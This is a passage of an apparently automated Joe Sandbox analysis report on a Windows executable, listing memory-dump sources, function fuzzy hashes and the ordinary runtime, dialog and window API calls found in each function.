                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: acdaf4b6210f9c57eca7b9ba63843f9283e26e9301ac6177dc7df63f06eea1dc
                  • Instruction ID: c930495a7c0c9a2f8f698e76503a415bb37b7726a9fa23d9996d83ff914d8149
                  • Opcode Fuzzy Hash: acdaf4b6210f9c57eca7b9ba63843f9283e26e9301ac6177dc7df63f06eea1dc
                  • Instruction Fuzzy Hash: F9F01DB190420C8FCB38CB58EC51AF973B5F759711F2006A9EA19437A4D374AD828F61
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00A0EAC5), ref: 00A0F068
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 9be86c4d5360f3a45e3a57bb82595f7bd6524359b7b8aedc639eb5a9091274f2
                  • Instruction ID: cb236625524a9ff788b0dd5a62cba702493d335dc3a8d92979354cb831543cdd
                  • Opcode Fuzzy Hash: 9be86c4d5360f3a45e3a57bb82595f7bd6524359b7b8aedc639eb5a9091274f2
                  • Instruction Fuzzy Hash:
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 9b7fe8b049de62eeee257049604b8ab3edf7b7a607adf966d5bade4d47eade2c
                  • Instruction ID: 100346af51e89c95c23b4aa682b4c06b92a6625eee7e92afaf9a648ff65f4d40
                  • Opcode Fuzzy Hash: 9b7fe8b049de62eeee257049604b8ab3edf7b7a607adf966d5bade4d47eade2c
                  • Instruction Fuzzy Hash: 38A012701002008B8B00CFB55A083193598750118130483246005C1020D62440224F00
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction ID: a14607717751d13ea95b2b4da4aaf68f9e0bc97fa9fdf8400c40b23eeec0ad3f
                  • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction Fuzzy Hash: 4E621A71A04B8D8FCB29CF34D9906BABBE1AF55308F04856DD8DB4B386D634E955CB10
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction ID: 0dbbc3ae55b2600ee73d892d18df11d7923407991799461df1c26a89a969883f
                  • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction Fuzzy Hash: 65621270A0878A9FC719CF28D8805BDBBE1BF55304F14866DD8A68B782D731F956CB80
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction ID: d008fc09943588a9714abaf4964a7dbb3c58099d4b0a108f93676bb8bd12472b
                  • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction Fuzzy Hash: D9524AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6598445a13781b5e00c847d54962ab504232370415eea2a45b1c0926bf4e4751
                  • Instruction ID: da1e3a5210f62f26c183e8cdcc03d0dfcbccc639f61b522e034ee0d3b71dc13c
                  • Opcode Fuzzy Hash: 6598445a13781b5e00c847d54962ab504232370415eea2a45b1c0926bf4e4751
                  • Instruction Fuzzy Hash: FC12C0B160470A8BC728CF28E9D06B9B3E1FF54308F14892EE597C7AC5D774A8A5CB45
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1381f28c54a256ab2f534c24b7e7459b7033287af20cbac81f98981aedcc09ca
                  • Instruction ID: 7eff089ca2f6c6f88f06a400a8664d645b937ce6495230c971d161e7dc0882a0
                  • Opcode Fuzzy Hash: 1381f28c54a256ab2f534c24b7e7459b7033287af20cbac81f98981aedcc09ca
                  • Instruction Fuzzy Hash: 9AF1AEB1A083098FC718CF28C68497EBBE5EFC9354F148A2EF69597251D770E946CB42
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction ID: fb7d31120b15dd09555f8d033e335f94a1030424e20765e7a6f058ea76d3e2e3
                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction Fuzzy Hash: F2C1A53A2194930ADF2D473AC5348BFFAA15AA27B131A075DD4B3CB1C4FE60D5E4DA20
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction ID: 15c8984f0c4b56287bc353cf69ea54ac4ba53107389e36038656023ee33743b1
                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction Fuzzy Hash: F3C1933A2195930ADF6D473985345BFFAA15AA27B131A076DD4B3CF0C8FE20D5E4DA20
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction ID: 1f78d16480612c75557351fe387d91fddcf2a0a9bbd6ba3338cde4b6f0ad35f8
                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction Fuzzy Hash: F6C1953A2095930ADF2D473985348BFFAA15EA27B131A076DD4B3CB1C5FE60D5E4DA20
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 6d3a955139d01cbc7d49d08e280c7aeffa5ae7773c8b9afb4f8bd5b640493ee8
                  • Instruction ID: 000be79f3f01bf6ca6d17c55daa96225fb77e772f6d43d768f97546edcf52ddf
                  • Opcode Fuzzy Hash: 6d3a955139d01cbc7d49d08e280c7aeffa5ae7773c8b9afb4f8bd5b640493ee8
                  • Instruction Fuzzy Hash: BDD118B1A043498FDB14DF28E88075BBBE0BF9534CF04456DE9449B682D734E968CBD6
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction ID: d38903e0644d11e2a67f68986becdba5c3f1d10e4b45131783d3f633bfc9e02a
                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction Fuzzy Hash: 5FC1B43A2055930ADF2D473985748BFBBA15AA27B131A076DD4B3CF1C4FEA0D5E4DA20
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21407f98256ed81ca4cbeaff81faf12124554b2fb2232f64184241175211593b
                  • Instruction ID: 360625940901eeaa0e64cd9728d7f796b32c2bf97d6b018057064ddd313eff6a
                  • Opcode Fuzzy Hash: 21407f98256ed81ca4cbeaff81faf12124554b2fb2232f64184241175211593b
                  • Instruction Fuzzy Hash: BFE147759083848FC304CF69D89096ABBF0BF9A300F85495EF9D587352C336EA09DB62
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction ID: 5a383cb99925fbdf190ea6042f61fea25361837372830ad074ce21cdc4d3ad2b
                  • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction Fuzzy Hash: 63915CB260474D8BDF24EF68E8D1BBA73E9EB80304F10092DE597D72C2DA759648C341
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6bc08576eb176704687d08ee3ad224a0c6553c2145d57d7dbd51044565bd34a0
                  • Instruction ID: 8da1ac77d2c6ff58ad87849684b450481af2dae0fa73f027151deae41bb7fbde
                  • Opcode Fuzzy Hash: 6bc08576eb176704687d08ee3ad224a0c6553c2145d57d7dbd51044565bd34a0
                  • Instruction Fuzzy Hash: 74618A71688B0956DE388B6C9995BFF23A8DF4D380F150A1AE882DF2C1D511DDC2C759
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction ID: fb8177e392a8010a0e7af24418ffa868f2eb7fef604a6a7745963213fea37c67
                  • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction Fuzzy Hash: 44711E72A0434E4BDF24DF29E8D0F7D77E9ABD0304F00492DE6868B2C2DA749A858751
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction ID: 588f93f923be4c8ae0220c0b5de6d7ad9f7da4eaaaf96be18fc58d0b77bc4751
                  • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction Fuzzy Hash: 36516AB1A00B855BDB348B7C89A5BFF67D99B5F300F180919E982DB2C2C315DDC68396
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7afc45b0e362a6f8df8247601b251e5781ed97156aac37be237a973de77b0b2d
                  • Instruction ID: d5bdcaa2527217483f8fdb4617d8cd8ce7eecc52702071f2451a3c17a4237b3c
                  • Opcode Fuzzy Hash: 7afc45b0e362a6f8df8247601b251e5781ed97156aac37be237a973de77b0b2d
                  • Instruction Fuzzy Hash: 34819E8221E6D8AEC716CFBC3CE02B93FA15733340B1D45BAE5C686273C536469AD721
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e81397f0895e770e82fca3693c8628e06fb77294065a21af849c63e24b7984bc
                  • Instruction ID: 573453bf10fff153a5dbe022f6d69a099158c22a3ca96fff0cbd237bc63e01ca
                  • Opcode Fuzzy Hash: e81397f0895e770e82fca3693c8628e06fb77294065a21af849c63e24b7984bc
                  • Instruction Fuzzy Hash: B551D1315083D94FC712CF24918457EBFE1BEDA314F49489EE5E54B226D220E789CBA2
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 884b4ed02497d91f277cad1678683e9db01e40780299186cb893c65d71da79f0
                  • Instruction ID: 884310b1564dac0206cc278b126932f6dd41ce0ee8b1683de3139bd5a0de776c
                  • Opcode Fuzzy Hash: 884b4ed02497d91f277cad1678683e9db01e40780299186cb893c65d71da79f0
                  • Instruction Fuzzy Hash: 73512571A083068FC748CF19D49059AF7E1FF88354F058A2EE899E7740DB34EA59CB96
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: c84099b60d10897ed2b9121080c5e4fee2ec6090e42ae4655ff82493e74efa8d
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: A131E5F2A1474A8FCB14EF28D85166EBBE0FB95300F10492DE599C7382C735EA59CB91
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 514545809fab076cae38363d0afc0be31cbfe140a6872818a4c271d3ce5276d4
                  • Instruction ID: b0ab83a2a8af26ad1db8f270879a4a711097a6b935e840ce58e4010eba5b4814
                  • Opcode Fuzzy Hash: 514545809fab076cae38363d0afc0be31cbfe140a6872818a4c271d3ce5276d4
                  • Instruction Fuzzy Hash: 6321DA32A201654FCB58CF6EEC908767766B786311747817BFB468B2D1C534E926C7A0
                  APIs
                  • _swprintf.LIBCMT ref: 009FDABE
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                    • Part of subcall function 00A01596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A30EE8,00000200,009FD202,00000000,?,00000050,00A30EE8), ref: 00A015B3
                  • _strlen.LIBCMT ref: 009FDADF
                  • SetDlgItemTextW.USER32(?,00A2E154,?), ref: 009FDB3F
                  • GetWindowRect.USER32(?,?), ref: 009FDB79
                  • GetClientRect.USER32(?,?), ref: 009FDB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 009FDC25
                  • GetWindowRect.USER32(?,?), ref: 009FDC52
                  • SetWindowTextW.USER32(?,?), ref: 009FDC95
                  • GetSystemMetrics.USER32(00000008), ref: 009FDC9D
                  • GetWindow.USER32(?,00000005), ref: 009FDCA8
                  • GetWindowRect.USER32(00000000,?), ref: 009FDCD5
                  • GetWindow.USER32(00000000,00000002), ref: 009FDD47
                  Strings
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981
                  • Opcode ID: ffd1779b4328c3dd4a879d77117bf6050a4bd1ad64f50d4b03efe30ef54e3685
                  • Instruction ID: cb592d7a86cc5c9d2a1f453eeb465b3b0727cac7291b8aca90cad13a13aace3b
                  • Opcode Fuzzy Hash: ffd1779b4328c3dd4a879d77117bf6050a4bd1ad64f50d4b03efe30ef54e3685
                  • Instruction Fuzzy Hash: E6819072209305AFD710DFA8CD85B6BBBE9FBC9705F04092DFA8493290D671E906CB52
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00A1C277
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE2F
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE41
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE53
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE65
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE77
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE89
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BE9B
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEAD
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEBF
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BED1
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEE3
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BEF5
                    • Part of subcall function 00A1BE12: _free.LIBCMT ref: 00A1BF07
                  • _free.LIBCMT ref: 00A1C26C
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1C28E
                  • _free.LIBCMT ref: 00A1C2A3
                  • _free.LIBCMT ref: 00A1C2AE
                  • _free.LIBCMT ref: 00A1C2D0
                  • _free.LIBCMT ref: 00A1C2E3
                  • _free.LIBCMT ref: 00A1C2F1
                  • _free.LIBCMT ref: 00A1C2FC
                  • _free.LIBCMT ref: 00A1C334
                  • _free.LIBCMT ref: 00A1C33B
                  • _free.LIBCMT ref: 00A1C358
                  • _free.LIBCMT ref: 00A1C370
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 72639a1b0f792181e2df7373eadee5309af3889ecde154a4fbaa6d6c6f7106b2
                  • Instruction ID: 6fa0392d857c9f5582fd664d3fdb379c1e8061ba847879fe655a8bc0430463e4
                  • Opcode Fuzzy Hash: 72639a1b0f792181e2df7373eadee5309af3889ecde154a4fbaa6d6c6f7106b2
                  • Instruction Fuzzy Hash: A1315A326402059FEB30AB78DA45BDAB3E9BF10320F148529E459DB951DF39ECC0DA60
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 00A0CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 00A0CD7D
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A0CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A0CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A0CDED
                  • DeleteObject.GDI32(00000000), ref: 00A0CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 00A0CDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: b1fafb5b2bd5e59de3be57e5ea5e115143f6b8027ba10fdc6694502a2f03afde
                  • Instruction ID: 23ecaf9ab27818993cb9570819165567c383b6aa531eb818f74696195bc9d55a
                  • Opcode Fuzzy Hash: b1fafb5b2bd5e59de3be57e5ea5e115143f6b8027ba10fdc6694502a2f03afde
                  • Instruction Fuzzy Hash: 2E11E7325417187BE631ABB0FC09F9F3A5CBB56762F004620FA46A60D2CA648D1797A5
                  APIs
                  • _free.LIBCMT ref: 00A18EC5
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A18ED1
                  • _free.LIBCMT ref: 00A18EDC
                  • _free.LIBCMT ref: 00A18EE7
                  • _free.LIBCMT ref: 00A18EF2
                  • _free.LIBCMT ref: 00A18EFD
                  • _free.LIBCMT ref: 00A18F08
                  • _free.LIBCMT ref: 00A18F13
                  • _free.LIBCMT ref: 00A18F1E
                  • _free.LIBCMT ref: 00A18F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 01d85a1bf328acbfde29a9d5994fd2530667ef0a049443242f6c87b2a5cf65b6
                  • Instruction ID: 55b9a126498751c0048f4bd9bdc7c723de49772aa63abc7e0412f4073f083c4a
                  • Opcode Fuzzy Hash: 01d85a1bf328acbfde29a9d5994fd2530667ef0a049443242f6c87b2a5cf65b6
                  • Instruction Fuzzy Hash: 9211B67650010DBFCB21EF54DA42CDA3BA5FF14350B5142A5FA088F66ADE35EE91DB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: 0f1218eaca907d224061569a4f2b41e45acc147d136c0ea976003a13bf98a81f
                  • Instruction ID: ab7c353aa44f3157055d140ec954dada096a96d1ab3164b0943f2abaefa26aea
                  • Opcode Fuzzy Hash: 0f1218eaca907d224061569a4f2b41e45acc147d136c0ea976003a13bf98a81f
                  • Instruction Fuzzy Hash: 66F128B160834D5BDB15EF388995BFE77996FD0300F084479FB85CB283DA64A848C7A2
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A0AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A0AD60
                  • SetWindowTextW.USER32(?,?), ref: 00A0AD71
                  • GetDlgItem.USER32(?,00000065), ref: 00A0AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A0AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A0ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
